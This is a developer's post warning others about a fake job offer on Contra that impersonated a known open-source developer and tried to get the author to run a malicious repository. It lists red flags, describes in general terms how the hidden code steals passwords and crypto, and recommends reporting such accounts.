Someone tried to hack me through a job offer on Contra. Here's how it works so you can see it coming.

Got a message last week from a "client" looking for a dev to build an AI tool. Solid-looking profile, real company linked, even the name and photo of a developer I actually recognized. I'm not going to name the person they were impersonating, they're well respected in the open-source world and I'm certain this had nothing to do with the real them.

And that's part of what nearly got me. I happened to know the project this "person" supposedly works on, so for a moment I figured it could be the real deal. But the closer I looked, the less it held together. The location didn't match. What they claimed to be doing here on Contra didn't line up with what the real person actually does in real life. That was the immediate red flag.

Because the account only existed for one thing: to get me to download their project and run it on my machine. That's where the whole attack lives. Not in the message, in running the code.

Once I started actually looking, the warning signs were everywhere. A couple of these together and you should bail:

• The profile looks senior and polished, but the person you're actually talking to is vague and slippery, and the details don't add up. • Won't give you a straight answer on budget, scope or timeline. Always pushes you to "just take a look at the project." • The location and the story don't match the real person they're claiming to be. • Drops a line about a previous dev who "failed" or "had an emergency," to make you feel like you have to move fast. • The job description is all AI and machine-learning buzzwords, but the actual project is something plain and ordinary. • The repo was created the same day they messaged you, basically no history on it. • The clincher: they want you to download it, run it, and send a screenshot of it working. Running it is the attack.

Here's what running it does. There's a bit of code hidden inside, in a file you'd have no reason to open. The setup instructions look completely clean, so nothing seems wrong. But as soon as the project starts, that hidden code phones a server, pulls down more code, and runs it on your computer. Then it goes for your passwords, your logins, your crypto, whatever it can grab. The screenshot looks normal on your end while all of that happens in the background.

So if something like this shows up:

• Don't run it. Reading the code is fine, installing or starting it is not. That's the part that bites you. • No real client needs you to run their existing code to prove anything. If that's the "test," it's not a test. • If it feels off, it's off. Report the account and block it. • And if they're wearing someone real's identity, give that person a heads-up. I did.

I reported this account to Contra and they've already banned it. The reporting works, so use it.

A job that drops out of nowhere, rushes you, and wants you running code you didn't write should always be a red flag.